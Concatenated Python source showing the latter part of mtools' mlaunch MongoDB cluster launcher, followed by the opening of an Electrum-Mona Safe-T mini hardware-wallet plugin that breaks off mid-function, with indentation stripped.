mongod_matches = self.get_tagged(['mongod'])
mongod_matches = mongod_matches.union(self.get_tagged(['config']))
mongod_matches = mongod_matches.intersection(matches)
self._start_on_ports(mongod_matches, wait=True)
# now start mongos
mongos_matches = self.get_tagged(['mongos']).intersection(matches)
self._start_on_ports(mongos_matches)
# wait for all matched nodes to be running
self.wait_for(matches)
# refresh discover
self.discover()
def list(self):
""" sub-command list. Takes no further parameters. Will discover the current configuration and
print a table of all the nodes with status and port.
"""
self.discover()
print_docs = []
# mongos
for node in sorted(self.get_tagged(['mongos'])):
doc = OrderedDict([ ('process','mongos'), ('port',node), ('status','running' if self.cluster_running[node] else 'down') ])
print_docs.append( doc )
if len(self.get_tagged(['mongos'])) > 0:
print_docs.append( None )
# configs
for node in sorted(self.get_tagged(['config'])):
doc = OrderedDict([ ('process','config server'), ('port',node), ('status','running' if self.cluster_running[node] else 'down') ])
print_docs.append( doc )
if len(self.get_tagged(['config'])) > 0:
print_docs.append( None )
# mongod
for shard in self._get_shard_names(self.loaded_args):
tags = []
replicaset = 'replicaset' in self.loaded_args and self.loaded_args['replicaset']
padding = ''
if shard:
print_docs.append(shard)
tags.append(shard)
padding = ' '
if replicaset:
# primary
primary = self.get_tagged(tags + ['primary', 'running'])
if len(primary) > 0:
node = list(primary)[0]
print_docs.append( OrderedDict([ ('process', padding+'primary'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
# secondaries
secondaries = self.get_tagged(tags + ['secondary', 'running'])
for node in sorted(secondaries):
print_docs.append( OrderedDict([ ('process', padding+'secondary'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
# data-bearing nodes that are down or not in the replica set yet
mongods = self.get_tagged(tags + ['mongod'])
arbiters = self.get_tagged(tags + ['arbiter'])
nodes = sorted(mongods - primary - secondaries - arbiters)
for node in nodes:
print_docs.append( OrderedDict([ ('process', padding+'mongod'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
# arbiters
for node in arbiters:
print_docs.append( OrderedDict([ ('process', padding+'arbiter'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
else:
nodes = self.get_tagged(tags + ['mongod'])
if len(nodes) > 0:
node = nodes.pop()
print_docs.append( OrderedDict([ ('process', padding+'single'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
if shard:
print_docs.append(None)
processes = self._get_processes()
startup = self.startup_info
# print tags as well
for doc in filter(lambda x: type(x) == OrderedDict, print_docs):
try:
doc['pid'] = processes[doc['port']].pid
except KeyError:
doc['pid'] = '-'
if self.args['verbose'] or self.args['tags']:
tags = self.get_tags_of_port(doc['port'])
doc['tags'] = ', '.join(tags)
if self.args['startup']:
try:
# first try running process (startup may be modified via start command)
doc['startup command'] = ' '.join(processes[doc['port']].cmdline())
except KeyError:
# if not running, use stored startup_info
doc['startup command'] = startup[str(doc['port'])]
print_docs.append( None )
print
print_table(print_docs)
def kill(self):
self.discover()
# get matching tags, can only send signals to running nodes
matches = self._get_ports_from_args(self.args, 'running')
processes = self._get_processes()
# convert signal to int
sig = self.args['signal']
if type(sig) == int:
pass
elif isinstance(sig, str):
try:
sig = int(sig)
except ValueError as e:
try:
sig = getattr(signal, sig)
except AttributeError as e:
raise SystemExit("can't parse signal '%s', use integer or signal name (SIGxxx)." % sig)
for port in processes:
# only send signal to matching processes
if port in matches:
p = processes[port]
p.send_signal(sig)
if self.args['verbose']:
print " %s on port %i, pid=%i" % (p.name, port, p.pid)
print "sent signal %s to %i process%s." % (sig, len(matches), '' if len(matches) == 1 else 'es')
# there is a very brief period in which nodes are not reachable anymore, but the
# port is not torn down fully yet and an immediate start command would fail. This
        # very short sleep prevents that case, and it is practically not noticeable by users
time.sleep(0.1)
# refresh discover
self.discover()
def restart(self):
# stop nodes via stop command
self.stop()
# there is a very brief period in which nodes are not reachable anymore, but the
# port is not torn down fully yet and an immediate start command would fail. This
        # very short sleep prevents that case, and it is practically not noticeable by users
time.sleep(0.1)
# refresh discover
self.discover()
# start nodes again via start command
self.start()
# --- below are api helper methods, can be called after creating an MLaunchTool() object
def discover(self):
""" This method will go out to each of the processes and get their state. It builds the
self.cluster_tree, self.cluster_tags, self.cluster_running data structures, needed
for sub-commands start, stop, list.
"""
# need self.args['command'] so fail if it's not available
if not self.args or not 'command' in self.args or not self.args['command']:
return
# load .mlaunch_startup file for start, stop, list, use current parameters for init
if self.args['command'] == 'init':
self.loaded_args, self.loaded_unknown_args = self.args, self.unknown_args
else:
if not self._load_parameters():
raise SystemExit("can't read %s/.mlaunch_startup, use 'mlaunch init ...' first." % self.dir)
# reset cluster_* variables
self.cluster_tree = {}
self.cluster_tags = defaultdict(list)
self.cluster_running = {}
# get shard names
shard_names = self._get_shard_names(self.loaded_args)
# some shortcut variables
is_sharded = 'sharded' in self.loaded_args and self.loaded_args['sharded'] != None
is_replicaset = 'replicaset' in self.loaded_args and self.loaded_args['replicaset']
is_csrs = 'csrs' in self.loaded_args and self.loaded_args['csrs']
is_single = 'single' in self.loaded_args and self.loaded_args['single']
has_arbiter = 'arbiter' in self.loaded_args and self.loaded_args['arbiter']
# determine number of nodes to inspect
if is_sharded:
num_config = self.loaded_args['config']
# at least one temp. mongos for adding shards, will be killed later on
num_mongos = max(1, self.loaded_args['mongos'])
num_shards = len(shard_names)
else:
num_shards = 1
num_config = 0
num_mongos = 0
num_nodes_per_shard = self.loaded_args['nodes'] if is_replicaset else 1
if has_arbiter:
num_nodes_per_shard += 1
num_nodes = num_shards * num_nodes_per_shard + num_config + num_mongos
current_port = self.loaded_args['port']
# tag all nodes with 'all'
self.cluster_tags['all'].extend ( range(current_port, current_port + num_nodes) )
# tag all nodes with their port number (as string) and whether they are running
for port in range(current_port, current_port + num_nodes):
self.cluster_tags[str(port)].append(port)
running = self.is_running(port)
self.cluster_running[port] = running
self.cluster_tags['running' if running else 'down'].append(port)
# find all mongos
for i in range(num_mongos):
port = i+current_port
# add mongos to cluster tree
self.cluster_tree.setdefault( 'mongos', [] ).append( port )
# add mongos to tags
self.cluster_tags['mongos'].append( port )
current_port += num_mongos
# find all mongods (sharded, replicaset or single)
if shard_names == None:
shard_names = [ None ]
for shard in shard_names:
port_range = range(current_port, current_port + num_nodes_per_shard)
# all of these are mongod nodes
self.cluster_tags['mongod'].extend( port_range )
if shard:
# if this is a shard, store in cluster_tree and tag shard name
self.cluster_tree.setdefault( 'shard', [] ).append( port_range )
self.cluster_tags[shard].extend( port_range )
if is_replicaset:
# get replica set states
rs_name = shard if shard else self.loaded_args['name']
try:
mrsc = Connection( ','.join( 'localhost:%i'%i for i in port_range ), replicaSet=rs_name )
# primary, secondaries, arbiters
# @todo: this is no longer working because MongoClient is now non-blocking
if mrsc.primary:
self.cluster_tags['primary'].append( mrsc.primary[1] )
self.cluster_tags['secondary'].extend( map(itemgetter(1), mrsc.secondaries) )
self.cluster_tags['arbiter'].extend( map(itemgetter(1), mrsc.arbiters) )
# secondaries in cluster_tree (order is now important)
self.cluster_tree.setdefault( 'secondary', [] )
for i, secondary in enumerate(sorted(map(itemgetter(1), mrsc.secondaries))):
if len(self.cluster_tree['secondary']) <= i:
self.cluster_tree['secondary'].append([])
self.cluster_tree['secondary'][i].append(secondary)
except (ConnectionFailure, ConfigurationError):
pass
elif is_single:
self.cluster_tags['single'].append( current_port )
# increase current_port
current_port += num_nodes_per_shard
# add config server to cluster tree
self.cluster_tree.setdefault( 'config', [] ).append( port )
for i in range(num_config):
port = i+current_port
try:
mc = MongoConnection('localhost:%i'%port)
mc.admin.command('ping')
running = True
except ConnectionFailure:
# node not reachable
running = False
# add config server to cluster tree
self.cluster_tree.setdefault( 'config', [] ).append( port )
# add config server to tags
self.cluster_tags['config'].append( port )
self.cluster_tags['mongod'].append( port )
current_port += num_mongos
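    # Worked example of the port layout discover() assumes (hypothetical invocation):
    # 'mlaunch init --sharded 2 --replicaset --nodes 3 --config 1 --mongos 2 --port 27017'
    # yields num_nodes = 2*3 + 1 + 2 = 9 consecutive ports:
    #     mongos        27017-27018
    #     shard01 (rs)  27019-27021
    #     shard02 (rs)  27022-27024
    #     config server 27025
    # i.e. the mongos processes sit at the front of the range, followed by the shard
    # mongods and finally the config server(s).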
def is_running(self, port):
""" returns if a host on a specific port is running. """
try:
con = MongoConnection('localhost:%s' % port)
con.admin.command('ping')
return True
except (AutoReconnect, ConnectionFailure):
return False
def get_tagged(self, tags):
""" The format for the tags list is tuples for tags: mongos, config, shard, secondary tags
of the form (tag, number), e.g. ('mongos', 2) which references the second mongos
in the list. For all other tags, it is simply the string, e.g. 'primary'.
"""
# if tags is a simple string, make it a list (note: tuples like ('mongos', 2) must be in a surrounding list)
if not hasattr(tags, '__iter__') and type(tags) == str:
tags = [ tags ]
nodes = set(self.cluster_tags['all'])
for tag in tags:
if re.match(r"\w+ \d{1,2}", tag):
# special case for tuple tags: mongos, config, shard, secondary. These can contain a number
tag, number = tag.split()
try:
branch = self.cluster_tree[tag][int(number)-1]
except (IndexError, KeyError):
continue
if hasattr(branch, '__iter__'):
subset = set(branch)
else:
subset = set([branch])
else:
# otherwise use tags dict to get the subset
subset = set(self.cluster_tags[tag])
nodes = nodes.intersection(subset)
return nodes
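    # Example (illustrative, hypothetical environment): on a sharded, replicated setup,
    #     self.get_tagged(['shard 2', 'secondary', 'running'])
    # intersects the port sets of the second shard, of all secondaries and of all running
    # nodes, i.e. it yields the ports of the running secondaries of shard 2.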
def get_tags_of_port(self, port):
""" get all tags related to a given port (inverse of what is stored in self.cluster_tags) """
return sorted([tag for tag in self.cluster_tags if port in self.cluster_tags[tag] ])
def wait_for(self, ports, interval=1.0, timeout=30, to_start=True):
""" Given a list of ports, spawns up threads that will ping the host on each port concurrently.
Returns when all hosts are running (if to_start=True) / shut down (if to_start=False)
"""
threads = []
queue = Queue.Queue()
for port in ports:
threads.append(threading.Thread(target=wait_for_host, args=(port, interval, timeout, to_start, queue)))
if self.args and 'verbose' in self.args and self.args['verbose']:
print "waiting for nodes %s..." % ('to start' if to_start else 'to shutdown')
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# get all results back and return tuple
return tuple(queue.get_nowait() for _ in ports)
# --- below here are internal helper methods, should not be called externally ---
def _convert_u2b(self, obj):
""" helper method to convert unicode back to plain text. """
if isinstance(obj, dict):
return dict([(self._convert_u2b(key), self._convert_u2b(value)) for key, value in obj.iteritems()])
elif isinstance(obj, list):
return [self._convert_u2b(element) for element in obj]
elif isinstance(obj, unicode):
return obj.encode('utf-8')
else:
return obj
def _load_parameters(self):
""" tries to load the .mlaunch_startup file that exists in each datadir.
Handles different protocol versions.
"""
datapath = self.dir
startup_file = os.path.join(datapath, '.mlaunch_startup')
if not os.path.exists(startup_file):
return False
in_dict = self._convert_u2b(json.load(open(startup_file, 'r')))
# handle legacy version without versioned protocol
if 'protocol_version' not in in_dict:
in_dict['protocol_version'] = 1
self.loaded_args = in_dict
self.startup_info = {}
# hostname was added recently
self.loaded_args['hostname'] = socket.gethostname()
elif in_dict['protocol_version'] == 2:
self.startup_info = in_dict['startup_info']
self.loaded_unknown_args = in_dict['unknown_args']
self.loaded_args = in_dict['parsed_args']
# changed 'authentication' to 'auth', if present (from old env) rename
if 'authentication' in self.loaded_args:
self.loaded_args['auth'] = self.loaded_args['authentication']
del self.loaded_args['authentication']
return True
def _store_parameters(self):
""" stores the startup parameters and config in the .mlaunch_startup file in the datadir. """
datapath = self.dir
out_dict = {
'protocol_version': 2,
'mtools_version': __version__,
'parsed_args': self.args,
'unknown_args': self.unknown_args,
'startup_info': self.startup_info
}
if not os.path.exists(datapath):
os.makedirs(datapath)
try:
json.dump(out_dict, open(os.path.join(datapath, '.mlaunch_startup'), 'w'), -1)
except Exception:
pass
def _create_paths(self, basedir, name=None):
""" create datadir and subdir paths. """
if name:
datapath = os.path.join(basedir, name)
else:
datapath = basedir
dbpath = os.path.join(datapath, 'db')
if not os.path.exists(dbpath):
os.makedirs(dbpath)
if self.args['verbose']:
print 'creating directory: %s'%dbpath
return datapath
def _get_ports_from_args(self, args, extra_tag):
tags = []
if 'tags' not in args:
args['tags'] = []
for tag1, tag2 in zip(args['tags'][:-1], args['tags'][1:]):
if re.match('^\d{1,2}$', tag1):
print "warning: ignoring numeric value '%s'" % tag1
continue
if re.match('^\d{1,2}$', tag2):
if tag1 in ['mongos', 'shard', 'secondary', 'config']:
# combine tag with number, separate by string
tags.append( '%s %s' % (tag1, tag2) )
continue
else:
print "warning: ignoring numeric value '%s' after '%s'" % (tag2, tag1)
tags.append( tag1 )
if len(args['tags']) > 0:
tag = args['tags'][-1]
if not re.match('^\d{1,2}$', tag):
tags.append(tag)
tags.append(extra_tag)
matches = self.get_tagged(tags)
return matches
def _filter_valid_arguments(self, arguments, binary="mongod", config=False):
""" check which of the list of arguments is accepted by the specified binary (mongod, mongos).
returns a list of accepted arguments. If an argument does not start with '-' but its preceding
argument was accepted, then it is accepted as well. Example ['--slowms', '1000'] both arguments
would be accepted for a mongod.
"""
if self.args and self.args['binarypath']:
binary = os.path.join( self.args['binarypath'], binary)
# get the help list of the binary
ret = subprocess.Popen(['%s --help'%binary], stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
out, err = ret.communicate()
accepted_arguments = []
# extract all arguments starting with a '-'
for line in [option for option in out.split('\n')]:
line = line.lstrip()
if line.startswith('-'):
argument = line.split()[0]
# exception: don't allow --oplogSize for config servers
if config and argument == '--oplogSize':
continue
accepted_arguments.append(argument)
# add undocumented option
if binary == "mongod":
accepted_arguments.append('--wiredTigerEngineConfigString')
# filter valid arguments
result = []
for i, arg in enumerate(arguments):
if arg.startswith('-'):
# check if the binary accepts this argument or special case -vvv for any number of v
if arg in accepted_arguments or re.match(r'-v+', arg):
result.append(arg)
elif i > 0 and arguments[i-1] in result:
# if it doesn't start with a '-', it could be the value of the last argument, e.g. `--slowms 1000`
result.append(arg)
# return valid arguments as joined string
return ' '.join(result)
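    # Example (illustrative; the flag names are hypothetical): assuming the local mongod
    # lists --slowms in its --help output but knows nothing about --fancyFlag,
    #     self._filter_valid_arguments(['--slowms', '1000', '--fancyFlag'], 'mongod')
    # returns '--slowms 1000': the unknown flag is dropped, and the bare value '1000'
    # is kept because the argument preceding it was accepted.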
def _get_shard_names(self, args):
""" get the shard names based on the self.args['sharded'] parameter. If it's a number, create
shard names of type shard##, where ## is a 2-digit number. Returns a list [ None ] if
no shards are present.
"""
if 'sharded' in args and args['sharded']:
if len(args['sharded']) == 1:
try:
# --sharded was a number, name shards shard01, shard02, ... (only works with replica sets)
n_shards = int(args['sharded'][0])
shard_names = ['shard%.2i'%(i+1) for i in range(n_shards)]
except ValueError, e:
# --sharded was a string, use it as name for the one shard
shard_names = args['sharded']
else:
shard_names = args['sharded']
else:
shard_names = [ None ]
return shard_names
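    # Example (illustrative):
    #     --sharded 2        -> ['shard01', 'shard02']
    #     --sharded tic tac  -> ['tic', 'tac']
    #     no --sharded       -> [None]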
def _start_on_ports(self, ports, wait=False, overrideAuth=False):
threads = []
if overrideAuth and self.args['verbose']:
print "creating cluster without auth for setup, will enable auth at the end..."
for port in ports:
command_str = self.startup_info[str(port)]
if overrideAuth:
# this is to set up sharded clusters without auth first, then relaunch with auth
command_str = re.sub(r'--keyFile \S+', '', command_str)
ret = subprocess.call([command_str], stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
binary = command_str.split()[0]
if '--configsvr' in command_str:
binary = 'config server'
if self.args['verbose']:
print "launching: %s" % command_str
else:
print "launching: %s on port %s" % (binary, port)
if ret > 0:
raise SystemExit("can't start process, return code %i. tried to launch: %s"% (ret, command_str))
if wait:
self.wait_for(ports)
def _initiate_replset(self, port, name, maxwait=30):
# initiate replica set
if not self.args['replicaset']:
return
con = MongoConnection('localhost:%i'%port)
try:
rs_status = con['admin'].command({'replSetGetStatus': 1})
except OperationFailure, e:
# not initiated yet
for i in range(maxwait):
try:
con['admin'].command({'replSetInitiate':self.config_docs[name]})
break
except OperationFailure, e:
print e.message, " - will retry"
time.sleep(1)
if self.args['verbose']:
print "initializing replica set '%s' with configuration: %s" % (name, self.config_docs[name])
print "replica set '%s' initialized." % name
def _add_user(self, port, name, password, database, roles):
con = MongoConnection('localhost:%i'%port)
try:
con[database].add_user(name, password=password, roles=roles)
except OperationFailure as e:
pass
except TypeError as e:
if pymongo_version < (2, 5, 0):
con[database].add_user(name, password=password)
warnings.warn('Your pymongo version is too old to support auth roles. Added a legacy user with root access. To support roles, you need to upgrade to pymongo >= 2.5.0')
else:
raise e
def _get_processes(self):
all_ports = self.get_tagged('running')
process_dict = {}
for p in psutil.process_iter():
# deal with zombie process errors in OSX
try:
name = p.name()
except psutil.NoSuchProcess:
continue
# skip all but mongod / mongos
if name not in ['mongos', 'mongod']:
continue
port = None
for possible_port in self.startup_info:
# compare ports based on command line argument
startup = self.startup_info[possible_port].split()
try:
p_port = p.cmdline()[p.cmdline().index('--port')+1]
startup_port = startup[startup.index('--port')+1]
except ValueError:
continue
if str(p_port) == str(startup_port):
port = int(possible_port)
break
# only consider processes belonging to this environment
if port in all_ports:
process_dict[port] = p
return process_dict
def _wait_for_primary(self, max_wait=120):
for i in range(max_wait):
self.discover()
if "primary" in self.cluster_tags and self.cluster_tags['primary']:
return True
time.sleep(1)
return False
# --- below are command line constructor methods, that build the command line strings to be called
def _construct_cmdlines(self):
""" This is the top-level _construct_* method. From here, it will branch out to
the different cases: _construct_sharded, _construct_replicaset, _construct_single. These
can themselves call each other (for example sharded needs to create the shards with
either replicaset or single node). At the lowest level, the construct_mongod, _mongos, _config
will create the actual command line strings and store them in self.startup_info.
"""
if self.args['sharded']:
# construct startup string for sharded environments
self._construct_sharded()
elif self.args['single']:
# construct startup string for single node environment
self._construct_single(self.dir, self.args['port'])
elif self.args['replicaset']:
# construct startup strings for a non-sharded replica set
self._construct_replset(self.dir, self.args['port'], self.args['name'])
# discover current setup
self.discover()
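    # Sketch of the result (hypothetical paths and port): after 'mlaunch init --single --port 27017',
    # self.startup_info would hold a single entry along the lines of
    #     {'27017': 'mongod --dbpath <datadir>/db --logpath <datadir>/mongod.log --port 27017 --logappend --fork'}
    # which is the shell command later handed to subprocess in _start_on_ports().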
def _construct_sharded(self):
""" construct command line strings for a sharded cluster. """
num_mongos = self.args['mongos'] if self.args['mongos'] > 0 else 1
shard_names = self._get_shard_names(self.args)
# create shards as stand-alones or replica sets
nextport = self.args['port'] + num_mongos
for shard in shard_names:
if self.args['single']:
self.shard_connection_str.append( self._construct_single(self.dir, nextport, name=shard) )
nextport += 1
elif self.args['replicaset']:
self.shard_connection_str.append( self._construct_replset(self.dir, nextport, shard) )
nextport += self.args['nodes']
if self.args['arbiter']:
nextport += 1
# start up config server(s)
config_string = []
config_names = ['config1', 'config2', 'config3'] if self.args['config'] == 3 else ['config']
if self.args['csrs']:
config_string.append(self._construct_config(self.dir, nextport, "configRepl", True))
else:
for name in config_names:
self._construct_config(self.dir, nextport, name)
config_string.append('%s:%i'%(self.args['hostname'], nextport))
nextport += 1
# multiple mongos use <datadir>/mongos/ as subdir for log files
if num_mongos > 1:
mongosdir = os.path.join(self.dir, 'mongos')
if not os.path.exists(mongosdir):
if self.args['verbose']:
print "creating directory: %s" % mongosdir
os.makedirs(mongosdir)
# start up mongos, but put them to the front of the port range
nextport = self.args['port']
for i in range(num_mongos):
if num_mongos > 1:
mongos_logfile = 'mongos/mongos_%i.log' % nextport
else:
mongos_logfile = 'mongos.log'
self._construct_mongos(os.path.join(self.dir, mongos_logfile), nextport, ','.join(config_string))
nextport += 1
def _construct_replset(self, basedir, portstart, name, extra=''):
""" construct command line strings for a replicaset, either for sharded cluster or by itself. """
self.config_docs[name] = {'_id':name, 'members':[]}
# Corner case for csrs to calculate the number of nodes by number of configservers
if extra == '--configsvr':
num_nodes = range(self.args['config'])
else:
num_nodes = range(self.args['nodes'])
for i in num_nodes:
datapath = self._create_paths(basedir, '%s/rs%i'%(name, i+1))
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), portstart+i, replset=name, extra=extra)
host = '%s:%i'%(self.args['hostname'], portstart+i)
self.config_docs[name]['members'].append({'_id':len(self.config_docs[name]['members']), 'host':host, 'votes':int(len(self.config_docs[name]['members']) < 7 - int(self.args['arbiter']))})
# launch arbiter if True
if self.args['arbiter']:
datapath = self._create_paths(basedir, '%s/arb'%(name))
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), portstart+self.args['nodes'], replset=name)
host = '%s:%i'%(self.args['hostname'], portstart+self.args['nodes'])
self.config_docs[name]['members'].append({'_id':len(self.config_docs[name]['members']), 'host':host, 'arbiterOnly': True})
return name + '/' + ','.join([c['host'] for c in self.config_docs[name]['members']])
def _construct_config(self, basedir, port, name=None, isReplSet=False):
""" construct command line strings for a config server """
if isReplSet:
return self._construct_replset(basedir, port, name, extra='--configsvr')
else:
datapath = self._create_paths(basedir, name)
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), port, replset=None, extra='--configsvr')
def _construct_single(self, basedir, port, name=None):
""" construct command line strings for a single node, either for shards or as a stand-alone. """
datapath = self._create_paths(basedir, name)
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), port, replset=None)
host = '%s:%i'%(self.args['hostname'], port)
return host
def _construct_mongod(self, dbpath, logpath, port, replset=None, extra=''):
""" construct command line strings for mongod process. """
rs_param = ''
if replset:
rs_param = '--replSet %s'%replset
auth_param = ''
if self.args['auth']:
key_path = os.path.abspath(os.path.join(self.dir, 'keyfile'))
auth_param = '--keyFile %s'%key_path
if self.unknown_args:
config = '--configsvr' in extra
extra = self._filter_valid_arguments(self.unknown_args, "mongod", config=config) + ' ' + extra
path = self.args['binarypath'] or ''
command_str = "%s %s --dbpath %s --logpath %s --port %i --logappend --fork %s %s"%(os.path.join(path, 'mongod'), rs_param, dbpath, logpath, port, auth_param, extra)
# store parameters in startup_info
self.startup_info[str(port)] = command_str
def _construct_mongos(self, logpath, port, configdb):
""" construct command line strings for a mongos process. """
extra = ''
out = subprocess.PIPE
if self.args['verbose']:
out = None
auth_param = ''
if self.args['auth']:
key_path = os.path.abspath(os.path.join(self.dir, 'keyfile'))
auth_param = '--keyFile %s'%key_path
if self.unknown_args:
extra = self._filter_valid_arguments(self.unknown_args, "mongos") + extra
path = self.args['binarypath'] or ''
command_str = "%s --logpath %s --port %i --configdb %s --logappend %s %s --fork"%(os.path.join(path, 'mongos'), logpath, port, configdb, auth_param, extra)
# store parameters in startup_info
self.startup_info[str(port)] = command_str
def _read_key_file(self):
with open(os.path.join(self.dir, 'keyfile'), 'r') as f:
return ''.join(f.readlines())
def main():
tool = MLaunchTool()
tool.run()
if __name__ == '__main__':
sys.exit(main())
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_mona.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_mona.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_mona.bip32 import BIP32Node
from electrum_mona import constants
from electrum_mona.i18n import _
from electrum_mona.plugin import Device
from electrum_mona.transaction import deserialize, Transaction
from electrum_mona.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_mona.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
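
# Sketch of the structures assembled by sign_transaction above (values are hypothetical,
# not taken from the plugin): prev_tx maps each spent txid to the full previous
# transaction, and xpub_path maps this keystore's master xpub to its derivation prefix, e.g.
#     prev_tx   = {'9b2a...e3f1': <Transaction>, ...}
#     xpub_path = {'xpub661MyMwAqRbc...': "m/44'/22'/0'"}
# Both are then handed to the plugin's sign_transaction, which drives the Safe-T device.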
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "ZCore"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
